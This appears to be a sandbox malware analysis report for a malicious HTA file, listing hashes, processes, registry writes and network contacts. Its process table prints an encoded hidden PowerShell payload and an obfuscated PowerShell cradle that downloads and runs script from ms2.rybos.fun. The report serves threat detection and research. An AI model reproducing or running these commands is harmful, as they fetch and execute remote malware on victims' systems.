| File name: | 9hpsuytjam.hta |
| Full analysis: | https://app.any.run/tasks/d7d1d272-70d3-4f8e-a59c-7a6cba4cce6e |
| Verdict: | Malicious activity |
| Analysis date: | April 29, 2025, 08:45:07 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | data |
| MD5: | 0ECD0E0D8EB374240EACA88D50CB82E1 |
| SHA1: | E20962DCAF10779AD9108684453352F40B411771 |
| SHA256: | 3DC47FAC2A624DC28192B6281C01AE6A5D1D2942F5AE0869B20A43242EDEFFCF |
| SSDEEP: | 49152:6YpYnY1YFYbYKYUY4YOYVYWYfYNYaY5Y/Yl:/ |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2772 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4040 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4108 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4488 | powershell.exe -w h -nop -ep un -E JAB2AFAAQQBtAGIAeQA9ACcANgA5ADYANQA3ADgAMgA0ADQARQA3ADQANQA3ADcAMgA2ADkANwA0ADYANQA0ADYANgA5ADYAQwA2ADUAMwBEADUAQgA2AEQANgAxADcANAA2ADgANQBEADMAQQAzAEEANQAyADYARgA3ADUANgBFADYANAAyADgAMgA4ADUAQgA2AEQANgAxADcANAA2ADgANQBEADMAQQAzAEEANQAzADcAMQA3ADIANwA0ADIAOAAzADMAMwAxADMAMgAyAEUAMwA1ADIAQQAzADcAMgBFADMANwAzADcAMgA5ADIAQgA1AEIANgBEADYAMQA3ADQANgA4ADUARAAzAEEAMwBBADUAMAA2AEYANwA3ADIAOAAzADQAMgBFADMAMAAzADkAMgBDADMAMwAyADkAMgA5ADIARgAyADgANQBCADYARAA2ADEANwA0ADYAOAA1AEQAMwBBADMAQQA0ADUANwA4ADcAMAAyADgAMwAyADIAOQAyAEIANQBCADYARAA2ADEANwA0ADYAOAA1AEQAMwBBADMAQQA0AEMANgBGADYANwAyADgAMwA1ADMAMQAzADIAMgBDADMAMgAyADkAMgA5ADIAQwAzADQAMgA5ADMAQgAyADQANQAyADcANAA2AEMANAA5ADYARQA2ADkANwA0ADUANQA2AEUANgA5ADYAMwA2AEYANgA0ADYANQA1ADMANwA0ADcAMgA2ADkANgBFADYANwAzAEQAMgA4ADUAQgA2AEQANgAxADcANAA2ADgANQBEADMAQQAzAEEANAA2ADYAQwA2AEYANgBGADcAMgAyADgANQBCADYARAA2ADEANwA0ADYAOAA1AEQAMwBBADMAQQA0ADMANgBGADcAMwAyADgAMwAzADMAMwAyADkAMgBBADMAOQAyADkAMgBCADUAQgA2AEQANgAxADcANAA2ADgANQBEADMAQQAzAEEANAAzADYANQA2ADkANgBDADYAOQA2AEUANgA3ADIAOAA1AEIANgBEADYAMQA3ADQANgA4ADUARAAzAEEAMwBBADUAMwA2ADkANgBFADIAOAAzADYAMwAxADIAOQAyAEEAMwA0ADIARQAzADMAMgA5ADIAOQAzAEIAMgA0ADUAQQA3ADcANAAzADcAMgA2ADUANgAxADcANAA2ADUANQAzADYANQA2ADMANwA0ADYAOQA2AEYANgBFADMARAAyADgAMgA0ADQARQA3ADQANQA3ADcAMgA2ADkANwA0ADYANQA0ADYANgA5ADYAQwA2ADUAMgBBADIAOAAyADQANQAyADcANAA2AEMANAA5ADYARQA2ADkANwA0ADUANQA2AEUANgA5ADYAMwA2AEYANgA0ADYANQA1ADMANwA0ADcAMgA2ADkANgBFADYANwAyAEIANQBCADYARAA2ADEANwA0ADYAOAA1AEQAMwBBADMAQQA1ADQANgAxADYARQAyADgAMwAyADMANwAyADkAMgA5ADIAOQAyAEQANQBCADYARAA2ADEANwA0ADYAOAA1AEQAMwBBADMAQQA1ADAANgBGADcANwAyADgAMwAyADIAQwAzADgAMgA5ADMAQgAyADQANABCADYANQA1ADcANgAxADYAOQA3ADQANAA2ADYARgA3ADIANQAzADYAOQA2AEUANgA3ADYAQwA2ADUANABGADYAMgA2AEEANgA1ADYAMwA3ADQAMwBEADUAQgA2AEQANgAxADcANAA2ADgANQBEADMAQQAzAEEANABDADYARgA2ADcAMgA4ADUAQgA2AEQANgAxADcANAA2ADgANQBEADMAQQAzAEEANAAxADYAMgA3ADMAMgA4ADIANAA1AEEANwA3ADQAMwA3ADIANgA1ADYAMQA3ADQANgA1ADUAMwA2ADUANgAzADcANAA2ADkANgBGADYARQAyADkAMgBCADMAMQAyAEMAMwAxADMAMAAyADkAMwBCADIANAA0AEQANgBEADQAMQA2AEMANgBDADYARgA2ADMANgAxADcANAA2ADUANAAzADYARgA2AEUANwA0ADYAOQA2ADcANwA1ADYARgA3ADUANwAzADQARAA2ADUANgBEADYARgA3ADIANwA5ADMARAAyADgANQBCADYARAA2ADEANwA0ADYAOAA1AEQAMwBBADMAQQA1ADMANgA5ADYARQAyADgAMgA0ADQAQgA2ADUANQA3ADYAMQA2ADkANwA0ADQANgA2AEYANwAyADUAMwA2ADkANgBFADYANwA2AEMANgA1ADQARgA2ADIANgBBADYANQA2ADMANwA0ADIAOQAyAEIANQBCADYARAA2ADEANwA0ADYAOAA1AEQAMwBBADMAQQA0ADMANgBGADcAMwAyADgAMgA0ADQARQA3ADQANQA3ADcAMgA2ADkANwA0ADYANQA0ADYANgA5ADYAQwA2ADUAMgA5ADIAOQAyAEEANQBCADYARAA2ADEANwA0ADYAOAA1AEQAMwBBADMAQQA1ADMANwAxADcAMgA3ADQAMgA4ADIANAA1ADIANwA0ADYAQwA0ADkANgBFADYAOQA3ADQANQA1ADYARQA2ADkANgAzADYARgA2ADQANgA1ADUAMwA3ADQANwAyADYAOQA2AEUANgA3ADIAOQAzAEIAMgA0ADQANAA2ADIANgA3ADQAMgA3ADIANgA1ADYAMQA2AEIANQAwADYARgA2ADkANgBFADcANAAzAEQANQBCADYARAA2ADEANwA0ADYAOAA1AEQAMwBBADMAQQA1ADIANgBGADcANQA2AEUANgA0ADIAOAAyADQANABEADYARAA0ADEANgBDADYAQwA2AEYANgAzADYAMQA3ADQANgA1ADQAMwA2AEYANgBFADcANAA2ADkANgA3ADcANQA2AEYANwA1ADcAMwA0AEQANgA1ADYARAA2AEYANwAyADcAOQAyAEYAMgA0ADQARQA3ADQANQA3ADcAMgA2ADkANwA0ADYANQA0ADYANgA5ADYAQwA2ADUAMgBDADMANgAyADkAMwBCADUANwA3ADIANgA5ADcANAA2ADUAMgBEADQAOAA2AEYANwAzADcANAAyADAAMgA3ADQANAA0ADIANAA3ADIANwAyAEMAMgA0ADQARQA3ADQANQA3ADcAMgA2ADkANwA0ADYANQA0ADYANgA5ADYAQwA2ADUAMgBDADIANAA1ADIANwA0ADYAQwA0ADkANgBFADYAOQA3ADQANQA1ADYARQA2ADkANgAzADYARgA2ADQANgA1ADUAMwA3ADQANwAyADYAOQA2AEUANgA3ADIAQwAyADQANQBBADcANwA0ADMANwAyADYANQA2ADEANwA0ADYANQA1ADMANgA1ADYAMwA3ADQANgA5ADYARgA2AEUAMgBDADIANAA0AEIANgA1ADUANwA2ADEANgA5ADcANAA0ADYANgBGADcAMgA1ADMANgA5ADYARQA2ADcANgBDADYANQA0AEYANgAyADYAQQA2ADUANgAzADcANAAyAEMAMgA0ADQARAA2AEQANAAxADYAQwA2AEMANgBGADYAMwA2ADEANwA0ADYANQA0ADMANgBGADYARQA3ADQANgA5ADYANwA3ADUANgBGADcANQA3ADMANABEADYANQA2AEQANgBGADcAMgA3ADkAMgBDADIANAA0ADQANgAyADYANwA0ADIANwAyADYANQA2ADEANgBCADUAMAA2AEYANgA5ADYARQA3ADQAMwBCADcAMwA2ADEANwAwADcAMwAyADAAMgAyADIANAA2ADUANgBFADcANgAzAEEANQA3ADQAOQA0AEUANAA0ADQAOQA1ADIANQBDADUAMwA3ADkANwAzADUANwA0AEYANQA3ADMANgAzADQANQBDADUANwA2ADkANgBFADYANAA2AEYANwA3ADcAMwA1ADAANgBGADcANwA2ADUANwAyADUAMwA2ADgANgA1ADYAQwA2AEMANQBDADcANgAzADEAMgBFADMAMAA1AEMANwAwADYARgA3ADcANgA1ADcAMgA3ADMANgA4ADYANQA2AEMANgBDADIARQA2ADUANwA4ADYANQAyADIAMgAwADIARAA0ADEANwAyADYANwA3ADUANgBEADYANQA2AEUANwA0ADQAQwA2ADkANwAzADcANAAyADAAMgA3ADIARAA2ADUANwA4ADYANQA2ADMAMgA3ADIAQwAyADcANwA1ADYARQA3ADIANgA1ADcAMwA3ADQANwAyADYAOQA2ADMANwA0ADYANQA2ADQAMgA3ADIAQwAyADcAMgBEADYAMwAyADcAMgBDADIANwA1ADMANgA1ADcANAAyAEQANQA2ADYAMQA3ADIANgA5ADYAMQA2ADIANgBDADYANQAyADAANQBBADYARQA2AEIAMgAwADIAOAAyADgAMgA4ADIAOAA1AEIANABFADYANQA3ADQAMgBFADUANwA2ADUANgAyADQAMwA2AEMANgA5ADYANQA2AEUANwA0ADUARAAzAEEAMwBBADQARQA2ADUANwA3ADIAOAAyADkANwBDADQANwA0AEQAMgA5ADcAQwA1ADcANgA4ADYANQA3ADIANgA1ADIARAA0AEYANgAyADYAQQA2ADUANgAzADcANAA3AEIAMgA0ADUARgAyAEUANABFADYAMQA2AEQANgA1ADIAMAAyAEQANgA5ADYAQwA2ADkANgBCADYANQAyADcAMgA3ADQANAAyAEEANgA3ADIANwAyADcANwBEADIAOQAyAEUANABFADYAMQA2AEQANgA1ADIAOQAyADkAMwBCADUAMwA2ADUANwA0ADIARAA1ADYANgAxADcAMgA2ADkANgAxADYAMgA2AEMANgA1ADIAMAAzADAAMwA5ADIAMAAyADgANQBCADQARQA2ADUANwA0ADIARQA1ADcANgA1ADYAMgA0ADMANgBDADYAOQA2ADUANgBFADcANAA1AEQAMwBBADMAQQA0AEUANgA1ADcANwAyADgAMgA5ADIAOQAzAEIANQAzADYANQA3ADQAMgBEADQAOQA3ADQANgA1ADYARAAyADAANQA2ADYAMQA3ADIANgA5ADYAMQA2ADIANgBDADYANQAzAEEAMgBGADMAOAAyADAAMgA3ADIANwA2ADgANwA0ADcANAA3ADAANwAzADMAQQAyAEYAMgBGADYARAA3ADMAMwAyADIARQA3ADIANwA5ADYAMgA2AEYANwAzADIARQA2ADYANwA1ADYARQAyAEYANgAxADcAMgA3ADIANgBGADcANwA1AEYANgA4ADUARgAzADEAMwA0ADMANQAyAEUANwAzADcANgA2ADcAMgA3ADIANwAzAEIAMgA0ADQANQA3ADgANgA1ADYAMwA3ADUANwA0ADYAOQA2AEYANgBFADQAMwA2AEYANgBFADcANAA2ADUANwA4ADcANAA3AEMAMgA1ADcAQgAyADQANQBGADIARQAyADgAMgA4ADIANAA0ADUANwA4ADYANQA2ADMANwA1ADcANAA2ADkANgBGADYARQA0ADMANgBGADYARQA3ADQANgA1ADcAOAA3ADQANwBDADQANwA0AEQAMgA5ADUAQgAzADYANQBEADIARQA0AEUANgAxADYARAA2ADUAMgA5ADcAQwAyADUANwBCADIANAA1AEYAMgBFADIAOAAyADgAMgA0ADQANQA3ADgANgA1ADYAMwA3ADUANwA0ADYAOQA2AEYANgBFADQAMwA2AEYANgBFADcANAA2ADUANwA4ADcANAAyAEUAMgA4ADIAOAAyADQANAA1ADcAOAA2ADUANgAzADcANQA3ADQANgA5ADYARgA2AEUANAAzADYARgA2AEUANwA0ADYANQA3ADgANwA0ADcAQwA0ADcANABEADIAOQA1AEIAMwA2ADUARAAyAEUANABFADYAMQA2AEQANgA1ADIAOQAyAEUANQAwADcAMwA0AEYANgAyADYAQQA2ADUANgAzADcANAAyAEUANABEADYANQA3ADQANgA4ADYARgA2ADQANwAzADcAQwA1ADcANgA4ADYANQA3ADIANgA1ADIARAA0AEYANgAyADYAQQA2ADUANgAzADcANAA3AEIAMgA0ADUARgAyAEUANABFADYAMQA2AEQANgA1ADIAMAAyAEQANgA5ADYAQwA2ADkANgBCADYANQAyADcAMgA3ADIAQQA3ADYAMgBBADYAOQA3ADAAMgBBADIANwAyADcANwBEADIAOQAyAEUANABFADYAMQA2AEQANgA1ADIAOQAyADgAMgA4ADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMgAwADMAMAAzADkAMgAwADIARAA1ADYANgAxADIAOQAyAEUAMgA4ADIAOAA0ADcANQA2ADIAMAA1AEEANgBFADYAQgAyADAAMgBEADUANgA2ADEAMgA5ADIAOQAyADgAMgA4ADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMgAwADMAOAAyADkAMgBFADUANgA2ADEANgBDADcANQA2ADUAMgA5ADIAOQA3AEQANwBEADIANwAyADAAMgBEADUANwA2ADkANgBFADYANAA2AEYANwA3ADUAMwA3ADQANwA5ADYAQwA2ADUAMgAwADQAOAA2ADkANgA0ADYANAA2ADUANgBFADMAQgAyADQANwBBADcANwA0ADIANgA2ADQAMgA2AEIANABCADYAMQAyADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADUANAA2ADUANgBEADcAMAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANQAwADYANgA0AEEANQA3ADIAOAAyADQANwA5ADcANwA1ADQANQA4ADYANAA1ADcANgBEADIAQwAyADAAMgA0ADYANQA2ADcANwA3ADcAMwA3ADkANwA0ADQANwA1AEEANQAwADIAOQA3AEIANgAzADcANQA3ADIANgBDADIAMAAyADQANwA5ADcANwA1ADQANQA4ADYANAA1ADcANgBEADIAMAAyAEQANgBGADIAMAAyADQANgA1ADYANwA3ADcANwAzADcAOQA3ADQANAA3ADUAQQA1ADAANwBEADMAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA2ADIANwA1ADcAQQA0AEQANgA3ADYANwA0ADYAMgA4ADIANAA3ADYANQAwADQAMQA2AEQANgAyADcAOQAyADkANwBCADUAMAA2ADYANABBADUANwAyADAAMgA0ADcANgA1ADAANAAxADYARAA2ADIANwA5ADIAMAAyADQANgA1ADYANwA3ADcANwAzADcAOQA3ADQANAA3ADUAQQA1ADAANwBEADMAQgAnADsAJABxAEMARQBDAG0AdQBMAHUAUwA9ACgAJAB2AFAAQQBtAGIAeQAgAC0AcwBwAGwAaQB0ACAAJwAoAD8APAA9AFwARwAuAC4AKQAnAHwAJQB7AFsAYwBoAGEAcgBdACgAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBJAG4AdAAzADIAKAAkAF8ALAAxADYAKQApAH0AKQAgAC0AagBvAGkAbgAgACcAJwA7ACAAJgAgACQAcQBDAEUAQwBtAHUATAB1AFMALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAzACkAIAAkAHEAQwBFAEMAbQB1AEwAdQBTAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4976 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5072 | "C:\Windows\SysWOW64\mshta.exe" C:\Users\admin\AppData\Local\Temp\9hpsuytjam.hta {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | C:\Windows\SysWOW64\mshta.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6712 | "C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -exec unrestricted -c Set-Variable Znk (((([Net.WebClient]::New()|GM)|Where-Object{$_.Name -ilike'D*g'}).Name));Set-Variable 09 ([Net.WebClient]::New());Set-Item Variable:/8 'https://ms2.rybos.fun/arrow_h_145.svg';$ExecutionContext|%{$_.(($ExecutionContext|GM)[6].Name)|%{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{$_.Name -ilike'*v*ip*'}).Name)((Variable 09 -Va).((GV Znk -Va))((Variable 8).Value))}} | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6972 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (5072) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (5072) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (5072) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (6712) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (6712) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (6712) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (6712) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (6712) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (6712) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (6712) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4488 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2ccfcabg.b44.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4488 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:94468770163C8E0DDC95AA7C951E46AA | SHA256:2B181A51D9E368A4FA1677DB3FC6154BA76892333A03EA05FE8836907620EF6F | |||
| 6712 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_y4tkzjky.ups.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6712 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_za0em2hq.mox.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4488 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_i5xzvpet.dlu.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 23.216.77.21:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
5640 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
5640 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 23.216.77.21:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3216 | svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
6544 | svchost.exe | 20.190.159.68:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6544 | svchost.exe | 184.30.131.245:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted |
2104 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5640 | SIHClient.exe | 52.149.20.212:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
ms2.rybos.fun |
| unknown |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |